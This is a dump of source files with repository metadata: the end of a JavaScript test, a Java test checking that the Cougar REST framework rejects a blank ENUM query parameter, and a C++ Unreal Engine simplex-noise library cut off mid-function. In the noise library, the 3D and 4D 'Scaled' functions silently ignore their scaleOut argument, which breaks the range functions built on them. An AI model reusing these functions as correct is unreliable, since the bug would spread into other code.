expect(checkTaskHandlerSpy).toHaveBeenCalledOnce();
});
});
|
JavaScript
|
MIT
|
FlameNutrition/flame-coach-web/src/components/DailyTask/__tests__/index.test.js
|
feb02f53-7b06-4774-a885-94f5ec1707e3
|
[]
|
[]
|
/*
* Copyright 2013, The Sporting Exchange Limited
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
// Originally from UpdatedComponentTests/StandardValidation/REST/Rest_IDL_QueryParam_ENUM_blank.xls;
package com.betfair.cougar.tests.updatedcomponenttests.standardvalidation.rest;
import com.betfair.testing.utils.cougar.misc.XMLHelpers;
import com.betfair.testing.utils.cougar.assertions.AssertionUtils;
import com.betfair.testing.utils.cougar.beans.HttpCallBean;
import com.betfair.testing.utils.cougar.beans.HttpResponseBean;
import com.betfair.testing.utils.cougar.enums.CougarMessageProtocolRequestTypeEnum;
import com.betfair.testing.utils.cougar.manager.AccessLogRequirement;
import com.betfair.testing.utils.cougar.manager.CougarManager;
import org.testng.annotations.Test;
import org.w3c.dom.Document;
import javax.xml.parsers.DocumentBuilderFactory;
import java.io.ByteArrayInputStream;
import java.sql.Timestamp;
import java.util.HashMap;
import java.util.Map;
/**
* Ensure that Cougar returns the correct fault, when a REST request passes a blank ENUM Query parameter
*/
public class RestIDLQueryParamENUMblankTest {
@Test
public void doTest() throws Exception {
// Create the HttpCallBean
CougarManager cougarManager1 = CougarManager.getInstance();
HttpCallBean httpCallBeanBaseline = cougarManager1.getNewHttpCallBean();
CougarManager cougarManagerBaseline = cougarManager1;
// Get the cougar logging attribute for getting log entries later
// Point the created HttpCallBean at the correct service
httpCallBeanBaseline.setServiceName("baseline", "cougarBaseline");
httpCallBeanBaseline.setVersion("v2");
// Set up the Http Call Bean to make the request
CougarManager cougarManager2 = CougarManager.getInstance();
HttpCallBean getNewHttpCallBean2 = cougarManager2.getNewHttpCallBean("87.248.113.14");
cougarManager2 = cougarManager2;
cougarManager2.setCougarFaultControllerJMXMBeanAttrbiute("DetailedFaults", "false");
getNewHttpCallBean2.setOperationName("enumOperation");
getNewHttpCallBean2.setServiceName("baseline", "cougarBaseline");
getNewHttpCallBean2.setVersion("v2");
// Set the parameters, setting the ENUM Query parameter as blank
Map map3 = new HashMap();
map3.put("headerParam","FooHeader");
getNewHttpCallBean2.setHeaderParams(map3);
Map map4 = new HashMap();
map4.put("queryParam","");
getNewHttpCallBean2.setQueryParams(map4);
getNewHttpCallBean2.setRestPostQueryObjects(DocumentBuilderFactory.newInstance().newDocumentBuilder().parse(new ByteArrayInputStream("<message><bodyParameter>FooBody</bodyParameter></message>".getBytes())));
// Get current time for getting log entries later
Timestamp getTimeAsTimeStamp11 = new Timestamp(System.currentTimeMillis());
// Make the 4 REST calls to the operation
cougarManager2.makeRestCougarHTTPCalls(getNewHttpCallBean2);
// Create the expected response as an XML document (Fault)
XMLHelpers xMLHelpers6 = new XMLHelpers();
Document createAsDocumentXml = xMLHelpers6.getXMLObjectFromString("<fault><faultcode>Client</faultcode><faultstring>DSC-0044</faultstring><detail/></fault>");
Document createAsDocumentJson = xMLHelpers6.getXMLObjectFromString("<fault><faultcode>Client</faultcode><faultstring>DSC-0044</faultstring><detail/></fault>");
// Convert the expected response to REST types for comparison with actual responses
Map<CougarMessageProtocolRequestTypeEnum, Object> convertResponseToRestTypesXml = cougarManager2.convertResponseToRestTypes(createAsDocumentXml, getNewHttpCallBean2);
Map<CougarMessageProtocolRequestTypeEnum, Object> convertResponseToRestTypesJson = cougarManager2.convertResponseToRestTypes(createAsDocumentJson, getNewHttpCallBean2);
// Check the 4 responses are as expected (Bad Request)
HttpResponseBean response7 = getNewHttpCallBean2.getResponseObjectsByEnum(com.betfair.testing.utils.cougar.enums.CougarMessageProtocolResponseTypeEnum.RESTXMLXML);
AssertionUtils.multiAssertEquals(convertResponseToRestTypesXml.get(CougarMessageProtocolRequestTypeEnum.RESTXML), response7.getResponseObject());
AssertionUtils.multiAssertEquals((int) 400, response7.getHttpStatusCode());
AssertionUtils.multiAssertEquals("Bad Request", response7.getHttpStatusText());
HttpResponseBean response8 = getNewHttpCallBean2.getResponseObjectsByEnum(com.betfair.testing.utils.cougar.enums.CougarMessageProtocolResponseTypeEnum.RESTJSONJSON);
AssertionUtils.multiAssertEquals(convertResponseToRestTypesJson.get(CougarMessageProtocolRequestTypeEnum.RESTJSON), response8.getResponseObject());
AssertionUtils.multiAssertEquals((int) 400, response8.getHttpStatusCode());
AssertionUtils.multiAssertEquals("Bad Request", response8.getHttpStatusText());
HttpResponseBean response9 = getNewHttpCallBean2.getResponseObjectsByEnum(com.betfair.testing.utils.cougar.enums.CougarMessageProtocolResponseTypeEnum.RESTXMLJSON);
AssertionUtils.multiAssertEquals(convertResponseToRestTypesXml.get(CougarMessageProtocolRequestTypeEnum.RESTJSON), response9.getResponseObject());
AssertionUtils.multiAssertEquals((int) 400, response9.getHttpStatusCode());
AssertionUtils.multiAssertEquals("Bad Request", response9.getHttpStatusText());
HttpResponseBean response10 = getNewHttpCallBean2.getResponseObjectsByEnum(com.betfair.testing.utils.cougar.enums.CougarMessageProtocolResponseTypeEnum.RESTJSONXML);
AssertionUtils.multiAssertEquals(convertResponseToRestTypesJson.get(CougarMessageProtocolRequestTypeEnum.RESTXML), response10.getResponseObject());
AssertionUtils.multiAssertEquals((int) 400, response10.getHttpStatusCode());
AssertionUtils.multiAssertEquals("Bad Request", response10.getHttpStatusText());
// generalHelpers.pauseTest(500L);
// Check the log entries are as expected
CougarManager cougarManager13 = CougarManager.getInstance();
cougarManager13.verifyAccessLogEntriesAfterDate(getTimeAsTimeStamp11, new AccessLogRequirement("87.248.113.14", "/cougarBaseline/v2/enumOperation", "BadRequest"),new AccessLogRequirement("87.248.113.14", "/cougarBaseline/v2/enumOperation", "BadRequest"),new AccessLogRequirement("87.248.113.14", "/cougarBaseline/v2/enumOperation", "BadRequest"),new AccessLogRequirement("87.248.113.14", "/cougarBaseline/v2/enumOperation", "BadRequest") );
}
}
|
Java
|
Apache-2.0
|
JLLeitschuh/cougar/cougar-test/cougar-normal-code-tests/src/test/java/com/betfair/cougar/tests/updatedcomponenttests/standardvalidation/rest/RestIDLQueryParamENUMblankTest.java
|
6971893a-1d8f-4dc4-b06f-88b01064f928
|
[{"tag": "IP_ADDRESS", "value": "87.248.113.14", "start": 2415, "end": 2428, "context": "ttpCallBean2 = cougarManager2.getNewHttpCallBean(\"87.248.113.14\");\n cougarManager2 = cougarManager2;\n\n "}, {"tag": "IP_ADDRESS", "value": "87.248.113.14", "start": 6881, "end": 6894, "context": "eration\", \"BadRequest\"),new AccessLogRequirement(\"87.248.113.14\", \"/cougarBaseline/v2/enumOperation\", \"BadRequest"}, {"tag": "IP_ADDRESS", "value": "87.248.113.14", "start": 6789, "end": 6802, "context": "e(getTimeAsTimeStamp11, new AccessLogRequirement(\"87.248.113.14\", \"/cougarBaseline/v2/enumOperation\", \"BadRequest"}, {"tag": "IP_ADDRESS", "value": "87.248.113.14", "start": 7065, "end": 7078, "context": "eration\", \"BadRequest\"),new AccessLogRequirement(\"87.248.113.14\", \"/cougarBaseline/v2/enumOperation\", \"BadRequest"}]
|
[{"tag": "IP_ADDRESS", "value": "87.248.113.14", "start": 2415, "end": 2428, "context": "ttpCallBean2 = cougarManager2.getNewHttpCallBean(\"87.248.113.14\");\n cougarManager2 = cougarManager2;\n\n "}, {"tag": "IP_ADDRESS", "value": "87.248.113.14", "start": 6881, "end": 6894, "context": "eration\", \"BadRequest\"),new AccessLogRequirement(\"87.248.113.14\", \"/cougarBaseline/v2/enumOperation\", \"BadRequest"}, {"tag": "IP_ADDRESS", "value": "87.248.113.14", "start": 6789, "end": 6802, "context": "e(getTimeAsTimeStamp11, new AccessLogRequirement(\"87.248.113.14\", \"/cougarBaseline/v2/enumOperation\", \"BadRequest"}, {"tag": "IP_ADDRESS", "value": "87.248.113.14", "start": 7065, "end": 7078, "context": "eration\", \"BadRequest\"),new AccessLogRequirement(\"87.248.113.14\", \"/cougarBaseline/v2/enumOperation\", \"BadRequest"}]
|
/*
SimplexNoise 1.0.0
-----
DevDad - Afan Olovcic @ www.art-and-code.com - 08/12/2015
This algorithm was originally designed by Ken Perlin, but my code has been
adapted and extended from the implementation written by Stefan Gustavson (stegu@itn.liu.se)
and modified to fit to Unreal Engine 4
* This is a clean, fast, modern and free Perlin Simplex noise function.
* If we change float to double it could be even faster but there is no double type in Blueprint
* All Public Functions are BlueprintCallable so they can be used in every blueprint
From DevDad and Dedicated to you and Unreal Community
Use it free for what ever you want
I only request that you mention me in the credits for your game in the way that feels most appropriate to you.
*/
#include "SimplexNoiseBPLibrary.h"
#include "SimplexNoisePrivatePCH.h"
// USimplexNoiseBPLibrary
#define FASTFLOOR(x) ( ((x)>0) ? ((int)x) : (((int)x)-1) )
USimplexNoiseBPLibrary::USimplexNoiseBPLibrary(const class FObjectInitializer& PCIP)
: Super(PCIP)
{
}
unsigned char USimplexNoiseBPLibrary::perm[512] = { 151,160,137,91,90,15,
131,13,201,95,96,53,194,233,7,225,140,36,103,30,69,142,8,99,37,240,21,10,23,
190, 6,148,247,120,234,75,0,26,197,62,94,252,219,203,117,35,11,32,57,177,33,
88,237,149,56,87,174,20,125,136,171,168, 68,175,74,165,71,134,139,48,27,166,
77,146,158,231,83,111,229,122,60,211,133,230,220,105,92,41,55,46,245,40,244,
102,143,54, 65,25,63,161, 1,216,80,73,209,76,132,187,208, 89,18,169,200,196,
135,130,116,188,159,86,164,100,109,198,173,186, 3,64,52,217,226,250,124,123,
5,202,38,147,118,126,255,82,85,212,207,206,59,227,47,16,58,17,182,189,28,42,
223,183,170,213,119,248,152, 2,44,154,163, 70,221,153,101,155,167, 43,172,9,
129,22,39,253, 19,98,108,110,79,113,224,232,178,185, 112,104,218,246,97,228,
251,34,242,193,238,210,144,12,191,179,162,241, 81,51,145,235,249,14,239,107,
49,192,214, 31,181,199,106,157,184, 84,204,176,115,121,50,45,127, 4,150,254,
138,236,205,93,222,114,67,29,24,72,243,141,128,195,78,66,215,61,156,180,
151,160,137,91,90,15,
131,13,201,95,96,53,194,233,7,225,140,36,103,30,69,142,8,99,37,240,21,10,23,
190, 6,148,247,120,234,75,0,26,197,62,94,252,219,203,117,35,11,32,57,177,33,
88,237,149,56,87,174,20,125,136,171,168, 68,175,74,165,71,134,139,48,27,166,
77,146,158,231,83,111,229,122,60,211,133,230,220,105,92,41,55,46,245,40,244,
102,143,54, 65,25,63,161, 1,216,80,73,209,76,132,187,208, 89,18,169,200,196,
135,130,116,188,159,86,164,100,109,198,173,186, 3,64,52,217,226,250,124,123,
5,202,38,147,118,126,255,82,85,212,207,206,59,227,47,16,58,17,182,189,28,42,
223,183,170,213,119,248,152, 2,44,154,163, 70,221,153,101,155,167, 43,172,9,
129,22,39,253, 19,98,108,110,79,113,224,232,178,185, 112,104,218,246,97,228,
251,34,242,193,238,210,144,12,191,179,162,241, 81,51,145,235,249,14,239,107,
49,192,214, 31,181,199,106,157,184, 84,204,176,115,121,50,45,127, 4,150,254,
138,236,205,93,222,114,67,29,24,72,243,141,128,195,78,66,215,61,156,180
};
void USimplexNoiseBPLibrary::setNoiseSeed(const int32& newSeed)
{
FMath::RandInit(newSeed);
for (uint16 it = 0; it < 256; ++it)
{
uint8 nextNum = FMath::RandRange(0, 255);
USimplexNoiseBPLibrary::perm[it] = (unsigned char)nextNum;
USimplexNoiseBPLibrary::perm[it + 256] = (unsigned char)nextNum;
}
}
static unsigned char simplex[64][4] = {
{ 0,1,2,3 },{ 0,1,3,2 },{ 0,0,0,0 },{ 0,2,3,1 },{ 0,0,0,0 },{ 0,0,0,0 },{ 0,0,0,0 },{ 1,2,3,0 },
{ 0,2,1,3 },{ 0,0,0,0 },{ 0,3,1,2 },{ 0,3,2,1 },{ 0,0,0,0 },{ 0,0,0,0 },{ 0,0,0,0 },{ 1,3,2,0 },
{ 0,0,0,0 },{ 0,0,0,0 },{ 0,0,0,0 },{ 0,0,0,0 },{ 0,0,0,0 },{ 0,0,0,0 },{ 0,0,0,0 },{ 0,0,0,0 },
{ 1,2,0,3 },{ 0,0,0,0 },{ 1,3,0,2 },{ 0,0,0,0 },{ 0,0,0,0 },{ 0,0,0,0 },{ 2,3,0,1 },{ 2,3,1,0 },
{ 1,0,2,3 },{ 1,0,3,2 },{ 0,0,0,0 },{ 0,0,0,0 },{ 0,0,0,0 },{ 2,0,3,1 },{ 0,0,0,0 },{ 2,1,3,0 },
{ 0,0,0,0 },{ 0,0,0,0 },{ 0,0,0,0 },{ 0,0,0,0 },{ 0,0,0,0 },{ 0,0,0,0 },{ 0,0,0,0 },{ 0,0,0,0 },
{ 2,0,1,3 },{ 0,0,0,0 },{ 0,0,0,0 },{ 0,0,0,0 },{ 3,0,1,2 },{ 3,0,2,1 },{ 0,0,0,0 },{ 3,1,2,0 },
{ 2,1,0,3 },{ 0,0,0,0 },{ 0,0,0,0 },{ 0,0,0,0 },{ 3,1,0,2 },{ 0,0,0,0 },{ 3,2,0,1 },{ 3,2,1,0 } };
double USimplexNoiseBPLibrary::_grad(int hash, double x)
{
int h = hash & 15;
double grad = 1.0 + (h & 7); // Gradient value 1.0, 2.0, ..., 8.0
if (h & 8) grad = -grad; // Set a random sign for the gradient
return (grad * x); // Multiply the gradient with the distance
}
double USimplexNoiseBPLibrary::_grad(int hash, double x, double y)
{
int h = hash & 7; // Convert low 3 bits of hash code
double u = h < 4 ? x : y; // into 8 simple gradient directions,
double v = h < 4 ? y : x; // and compute the dot product with (x,y).
return ((h & 1) ? -u : u) + ((h & 2) ? -2.0f*v : 2.0f*v);
}
double USimplexNoiseBPLibrary::_grad(int hash, double x, double y, double z)
{
int h = hash & 15; // Convert low 4 bits of hash code into 12 simple
double u = h < 8 ? x : y; // gradient directions, and compute dot product.
double v = h < 4 ? y : h == 12 || h == 14 ? x : z; // Fix repeats at h = 12 to 15
return ((h & 1) ? -u : u) + ((h & 2) ? -v : v);
}
double USimplexNoiseBPLibrary::_grad(int hash, double x, double y, double z, double t)
{
int h = hash & 31; // Convert low 5 bits of hash code into 32 simple
double u = h < 24 ? x : y; // gradient directions, and compute dot product.
double v = h < 16 ? y : z;
double w = h < 8 ? z : t;
return ((h & 1) ? -u : u) + ((h & 2) ? -v : v) + ((h & 4) ? -w : w);
}
double USimplexNoiseBPLibrary::_simplexNoise1D(double x)
{
int i0 = FASTFLOOR(x);
int i1 = i0 + 1;
double x0 = x - i0;
double x1 = x0 - 1.0;
double n0, n1;
double t0 = 1.0 - x0 * x0;
// if(t0 < 0.0f) t0 = 0.0f;
t0 *= t0;
n0 = t0 * t0 * _grad(perm[i0 & 0xff], x0);
double t1 = 1.0 - x1 * x1;
// if(t1 < 0.0f) t1 = 0.0f;
t1 *= t1;
n1 = t1 * t1 * _grad(perm[i1 & 0xff], x1);
// The maximum value of this noise is 8*(3/4)^4 = 2.53125
// A factor of 0.395 would scale to fit exactly within [-1,1], but
// we want to match PRMan's 1D noise, so we scale it down some more.
return 0.25* (n0 + n1);
}
double USimplexNoiseBPLibrary::_simplexNoise2D(double x, double y)
{
#define F2 0.366025403784438 // F2 = 0.5*(sqrt(3.0)-1.0)
#define G2 0.211324865405187 // G2 = (3.0-Math.sqrt(3.0))/6.0
double n0, n1, n2; // Noise contributions from the three corners
// Skew the input space to determine which simplex cell we're in
double s = (x + y) * F2; // Hairy factor for 2D
double xs = x + s;
double ys = y + s;
int i = FASTFLOOR(xs);
int j = FASTFLOOR(ys);
double t = (double)(i + j) * G2;
double X0 = i - t; // Unskew the cell origin back to (x,y) space
double Y0 = j - t;
double x0 = x - X0; // The x,y distances from the cell origin
double y0 = y - Y0;
// For the 2D case, the simplex shape is an equilateral triangle.
// Determine which simplex we are in.
int i1, j1; // Offsets for second (middle) corner of simplex in (i,j) coords
if (x0 > y0) { i1 = 1; j1 = 0; } // lower triangle, XY order: (0,0)->(1,0)->(1,1)
else { i1 = 0; j1 = 1; } // upper triangle, YX order: (0,0)->(0,1)->(1,1)
// A step of (1,0) in (i,j) means a step of (1-c,-c) in (x,y), and
// a step of (0,1) in (i,j) means a step of (-c,1-c) in (x,y), where
// c = (3-sqrt(3))/6
double x1 = x0 - i1 + G2; // Offsets for middle corner in (x,y) unskewed coords
double y1 = y0 - j1 + G2;
double x2 = x0 - 1.0 + 2.0 * G2; // Offsets for last corner in (x,y) unskewed coords
double y2 = y0 - 1.0 + 2.0 * G2;
// Wrap the integer indices at 256, to avoid indexing perm[] out of bounds
int ii = i & 0xff;
int jj = j & 0xff;
// Calculate the contribution from the three corners
double t0 = 0.5 - x0 * x0 - y0 * y0;
if (t0 < 0.0f) n0 = 0.0f;
else {
t0 *= t0;
n0 = t0 * t0 * _grad(perm[ii + perm[jj]], x0, y0);
}
double t1 = 0.5 - x1 * x1 - y1 * y1;
if (t1 < 0.0) n1 = 0.0;
else {
t1 *= t1;
n1 = t1 * t1 * _grad(perm[ii + i1 + perm[jj + j1]], x1, y1);
}
double t2 = 0.5 - x2 * x2 - y2 * y2;
if (t2 < 0.0) n2 = 0.0;
else {
t2 *= t2;
n2 = t2 * t2 * _grad(perm[ii + 1 + perm[jj + 1]], x2, y2);
}
// Add contributions from each corner to get the final noise value.
// The result is scaled to return values in the interval [-1,1]
return 40.0 / 0.884343445 * (n0 + n1 + n2); //accurate to e-9 so that values scale to [-1, 1], same acc as F2 G2.
}
double USimplexNoiseBPLibrary::_simplexNoise3D(double x, double y, double z)
{
// Simple skewing factors for the 3D case
#define F3 0.3333333333333333333
#define G3 0.1666666666666666667
double n0, n1, n2, n3; // Noise contributions from the four corners
// Skew the input space to determine which simplex cell we're in
double s = (x + y + z) * F3; // Very nice and simple skew factor for 3D
double xs = x + s;
double ys = y + s;
double zs = z + s;
int i = FASTFLOOR(xs);
int j = FASTFLOOR(ys);
int k = FASTFLOOR(zs);
double t = (double)(i + j + k) * G3;
double X0 = i - t; // Unskew the cell origin back to (x,y,z) space
double Y0 = j - t;
double Z0 = k - t;
double x0 = x - X0; // The x,y,z distances from the cell origin
double y0 = y - Y0;
double z0 = z - Z0;
// For the 3D case, the simplex shape is a slightly irregular tetrahedron.
// Determine which simplex we are in.
int i1, j1, k1; // Offsets for second corner of simplex in (i,j,k) coords
int i2, j2, k2; // Offsets for third corner of simplex in (i,j,k) coords
/* This code would benefit from a backport from the GLSL version! */
if (x0 >= y0) {
if (y0 >= z0)
{
i1 = 1; j1 = 0; k1 = 0; i2 = 1; j2 = 1; k2 = 0;
} // X Y Z order
else if (x0 >= z0) { i1 = 1; j1 = 0; k1 = 0; i2 = 1; j2 = 0; k2 = 1; } // X Z Y order
else { i1 = 0; j1 = 0; k1 = 1; i2 = 1; j2 = 0; k2 = 1; } // Z X Y order
}
else { // x0<y0
if (y0 < z0) { i1 = 0; j1 = 0; k1 = 1; i2 = 0; j2 = 1; k2 = 1; } // Z Y X order
else if (x0 < z0) { i1 = 0; j1 = 1; k1 = 0; i2 = 0; j2 = 1; k2 = 1; } // Y Z X order
else { i1 = 0; j1 = 1; k1 = 0; i2 = 1; j2 = 1; k2 = 0; } // Y X Z order
}
// A step of (1,0,0) in (i,j,k) means a step of (1-c,-c,-c) in (x,y,z),
// a step of (0,1,0) in (i,j,k) means a step of (-c,1-c,-c) in (x,y,z), and
// a step of (0,0,1) in (i,j,k) means a step of (-c,-c,1-c) in (x,y,z), where
// c = 1/6.
double x1 = x0 - i1 + G3; // Offsets for second corner in (x,y,z) coords
double y1 = y0 - j1 + G3;
double z1 = z0 - k1 + G3;
double x2 = x0 - i2 + 2.0 * G3; // Offsets for third corner in (x,y,z) coords
double y2 = y0 - j2 + 2.0 * G3;
double z2 = z0 - k2 + 2.0 * G3;
double x3 = x0 - 1.0 + 3.0 * G3; // Offsets for last corner in (x,y,z) coords
double y3 = y0 - 1.0 + 3.0 * G3;
double z3 = z0 - 1.0 + 3.0 * G3;
// Wrap the integer indices at 256, to avoid indexing perm[] out of bounds
int ii = i & 0xff;
int jj = j & 0xff;
int kk = k & 0xff;
// Calculate the contribution from the four corners
double t0 = 0.6 - x0 * x0 - y0 * y0 - z0 * z0;
if (t0 < 0.0) n0 = 0.0;
else {
t0 *= t0;
n0 = t0 * t0 * _grad(perm[ii + perm[jj + perm[kk]]], x0, y0, z0);
}
double t1 = 0.6 - x1 * x1 - y1 * y1 - z1 * z1;
if (t1 < 0.0) n1 = 0.0;
else {
t1 *= t1;
n1 = t1 * t1 * _grad(perm[ii + i1 + perm[jj + j1 + perm[kk + k1]]], x1, y1, z1);
}
double t2 = 0.6 - x2 * x2 - y2 * y2 - z2 * z2;
if (t2 < 0.0) n2 = 0.0;
else {
t2 *= t2;
n2 = t2 * t2 * _grad(perm[ii + i2 + perm[jj + j2 + perm[kk + k2]]], x2, y2, z2);
}
double t3 = 0.6 - x3 * x3 - y3 * y3 - z3 * z3;
if (t3 < 0.0) n3 = 0.0;
else {
t3 *= t3;
n3 = t3 * t3 * _grad(perm[ii + 1 + perm[jj + 1 + perm[kk + 1]]], x3, y3, z3);
}
// Add contributions from each corner to get the final noise value.
// The result is scaled to stay just inside [-1,1]
return 32.0 * (n0 + n1 + n2 + n3); // TODO: The scale factor is preliminary!
}
double USimplexNoiseBPLibrary::_simplexNoise4D(double x, double y, double z, double w)
{
#define F4 0.3090169943749474 // F4 = (Math.sqrt(5.0)-1.0)/4.0
#define G4 0.1381966011250105 // G4 = (5.0-Math.sqrt(5.0))/20.0
double n0, n1, n2, n3, n4; // Noise contributions from the five corners
// Skew the (x,y,z,w) space to determine which cell of 24 simplices we're in
double s = (x + y + z + w) * F4; // Factor for 4D skewing
double xs = x + s;
double ys = y + s;
double zs = z + s;
double ws = w + s;
int i = FASTFLOOR(xs);
int j = FASTFLOOR(ys);
int k = FASTFLOOR(zs);
int l = FASTFLOOR(ws);
double t = (i + j + k + l) * G4; // Factor for 4D unskewing
double X0 = i - t; // Unskew the cell origin back to (x,y,z,w) space
double Y0 = j - t;
double Z0 = k - t;
double W0 = l - t;
double x0 = x - X0; // The x,y,z,w distances from the cell origin
double y0 = y - Y0;
double z0 = z - Z0;
double w0 = w - W0;
// For the 4D case, the simplex is a 4D shape I won't even try to describe.
// To find out which of the 24 possible simplices we're in, we need to
// determine the magnitude ordering of x0, y0, z0 and w0.
// The method below is a good way of finding the ordering of x,y,z,w and
// then find the correct traversal order for the simplex were in.
// First, six pair-wise comparisons are performed between each possible pair
// of the four coordinates, and the results are used to add up binary bits
// for an integer index.
int c1 = (x0 > y0) ? 32 : 0;
int c2 = (x0 > z0) ? 16 : 0;
int c3 = (y0 > z0) ? 8 : 0;
int c4 = (x0 > w0) ? 4 : 0;
int c5 = (y0 > w0) ? 2 : 0;
int c6 = (z0 > w0) ? 1 : 0;
int c = c1 + c2 + c3 + c4 + c5 + c6;
int i1, j1, k1, l1; // The integer offsets for the second simplex corner
int i2, j2, k2, l2; // The integer offsets for the third simplex corner
int i3, j3, k3, l3; // The integer offsets for the fourth simplex corner
// simplex[c] is a 4-vector with the numbers 0, 1, 2 and 3 in some order.
// Many values of c will never occur, since e.g. x>y>z>w makes x<z, y<w and x<w
// impossible. Only the 24 indices which have non-zero entries make any sense.
// We use a thresholding to set the coordinates in turn from the largest magnitude.
// The number 3 in the "simplex" array is at the position of the largest coordinate.
i1 = simplex[c][0] >= 3 ? 1 : 0;
j1 = simplex[c][1] >= 3 ? 1 : 0;
k1 = simplex[c][2] >= 3 ? 1 : 0;
l1 = simplex[c][3] >= 3 ? 1 : 0;
// The number 2 in the "simplex" array is at the second largest coordinate.
i2 = simplex[c][0] >= 2 ? 1 : 0;
j2 = simplex[c][1] >= 2 ? 1 : 0;
k2 = simplex[c][2] >= 2 ? 1 : 0;
l2 = simplex[c][3] >= 2 ? 1 : 0;
// The number 1 in the "simplex" array is at the second smallest coordinate.
i3 = simplex[c][0] >= 1 ? 1 : 0;
j3 = simplex[c][1] >= 1 ? 1 : 0;
k3 = simplex[c][2] >= 1 ? 1 : 0;
l3 = simplex[c][3] >= 1 ? 1 : 0;
// The fifth corner has all coordinate offsets = 1, so no need to look that up.
double x1 = x0 - i1 + G4; // Offsets for second corner in (x,y,z,w) coords
double y1 = y0 - j1 + G4;
double z1 = z0 - k1 + G4;
double w1 = w0 - l1 + G4;
double x2 = x0 - i2 + 2.0 * G4; // Offsets for third corner in (x,y,z,w) coords
double y2 = y0 - j2 + 2.0 * G4;
double z2 = z0 - k2 + 2.0 * G4;
double w2 = w0 - l2 + 2.0 * G4;
double x3 = x0 - i3 + 3.0 * G4; // Offsets for fourth corner in (x,y,z,w) coords
double y3 = y0 - j3 + 3.0 * G4;
double z3 = z0 - k3 + 3.0 * G4;
double w3 = w0 - l3 + 3.0 * G4;
double x4 = x0 - 1.0 + 4.0 * G4; // Offsets for last corner in (x,y,z,w) coords
double y4 = y0 - 1.0 + 4.0 * G4;
double z4 = z0 - 1.0 + 4.0 * G4;
double w4 = w0 - 1.0 + 4.0 * G4;
// Wrap the integer indices at 256, to avoid indexing perm[] out of bounds
int ii = i & 0xff;
int jj = j & 0xff;
int kk = k & 0xff;
int ll = l & 0xff;
// Calculate the contribution from the five corners
double t0 = 0.6 - x0 * x0 - y0 * y0 - z0 * z0 - w0 * w0;
if (t0 < 0.0) n0 = 0.0;
else {
t0 *= t0;
n0 = t0 * t0 * _grad(perm[ii + perm[jj + perm[kk + perm[ll]]]], x0, y0, z0, w0);
}
double t1 = 0.6 - x1 * x1 - y1 * y1 - z1 * z1 - w1 * w1;
if (t1 < 0.0) n1 = 0.0;
else {
t1 *= t1;
n1 = t1 * t1 * _grad(perm[ii + i1 + perm[jj + j1 + perm[kk + k1 + perm[ll + l1]]]], x1, y1, z1, w1);
}
double t2 = 0.6 - x2 * x2 - y2 * y2 - z2 * z2 - w2 * w2;
if (t2 < 0.0) n2 = 0.0;
else {
t2 *= t2;
n2 = t2 * t2 * _grad(perm[ii + i2 + perm[jj + j2 + perm[kk + k2 + perm[ll + l2]]]], x2, y2, z2, w2);
}
double t3 = 0.6 - x3 * x3 - y3 * y3 - z3 * z3 - w3 * w3;
if (t3 < 0.0) n3 = 0.0;
else {
t3 *= t3;
n3 = t3 * t3 * _grad(perm[ii + i3 + perm[jj + j3 + perm[kk + k3 + perm[ll + l3]]]], x3, y3, z3, w3);
}
double t4 = 0.6 - x4 * x4 - y4 * y4 - z4 * z4 - w4 * w4;
if (t4 < 0.0) n4 = 0.0;
else {
t4 *= t4;
n4 = t4 * t4 * _grad(perm[ii + 1 + perm[jj + 1 + perm[kk + 1 + perm[ll + 1]]]], x4, y4, z4, w4);
}
// Sum up and scale the result to cover the range [-1,1]
return 27.0 * (n0 + n1 + n2 + n3 + n4);
}
// 1D Simplex Noise
float USimplexNoiseBPLibrary::SimplexNoise1D(float x, float inFactor)
{
return (float)_simplexNoise1D(x * inFactor);
}
// 2D Simplex Noise
float USimplexNoiseBPLibrary::SimplexNoise2D(float x, float y, float inFactor)
{
return (float)_simplexNoise2D(x * inFactor, y * inFactor);
}
// 3D Simplex Noise
float USimplexNoiseBPLibrary::SimplexNoise3D(float x, float y, float z, float inFactor)
{
return (float)_simplexNoise3D(x * inFactor, y * inFactor, z* inFactor);
}
// 4D Simplex Noise
float USimplexNoiseBPLibrary::SimplexNoise4D(float x, float y, float z, float w, float inFactor)
{
return (float)_simplexNoise4D(x * inFactor, y * inFactor, z * inFactor, w * inFactor);
}
// Scaled by float value
float USimplexNoiseBPLibrary::SimplexNoiseScaled1D(float x, float scaleOut, float inFactor)
{
return _simplexNoise1D(x * inFactor) * scaleOut;
}
float USimplexNoiseBPLibrary::SimplexNoiseScaled2D(float x, float y, float scaleOut, float inFactor)
{
return _simplexNoise2D(x * inFactor, y * inFactor) * scaleOut;
}
float USimplexNoiseBPLibrary::SimplexNoiseScaled3D(float x, float y, float z, float scaleOut, float inFactor)
{
return _simplexNoise3D((x * inFactor), (y * inFactor), (z * inFactor));
}
float USimplexNoiseBPLibrary::SimplexNoiseScaled4D(float x, float y, float z, float w, float scaleOut, float inFactor)
{
return _simplexNoise4D(x * inFactor, y * inFactor, z * inFactor, w * inFactor);
};
// Return value in Range between two float numbers
// Return Value is scaled by difference between rangeMin & rangeMax value
float USimplexNoiseBPLibrary::SimplexNoiseInRange1D(float x, float rangeMin, float rangeMax, float inFactor)
{
if (rangeMax < rangeMin)rangeMax = rangeMin + 1.0f; // prevent negative numbers in that case we will return value between 0 - 1
return SimplexNoiseScaled1D(x, (rangeMax - rangeMin), inFactor) + rangeMin;
}
float USimplexNoiseBPLibrary::SimplexNoiseInRange2D(float x, float y, float rangeMin, float rangeMax, float inFactor)
{
if (rangeMax < rangeMin)rangeMax = rangeMin + 1.0f; // prevent negative numbers in that case we will return value between 0 - 1
return SimplexNoiseScaled2D(x,y, (rangeMax - rangeMin), inFactor) + rangeMin;
}
float USimplexNoiseBPLibrary::SimplexNoiseInRange3D(float x, float y, float z, float rangeMin, float rangeMax, float inFactor)
{
if (rangeMax < rangeMin)rangeMax = rangeMin + 1.0f; // prevent negative numbers in that case we will return value between 0 - 1
return SimplexNoiseScaled3D(x,y,z, (rangeMax - rangeMin), inFactor) + rangeMin;
}
float USimplexNoiseBPLibrary::SimplexNoiseInRange4D(float x, float y, float z, float w, float rangeMin, float rangeMax, float inFactor)
{
if (rangeMax < rangeMin)rangeMax = rangeMin + 1.0f; // prevent negative numbers in that case we will return value between 0 - 1
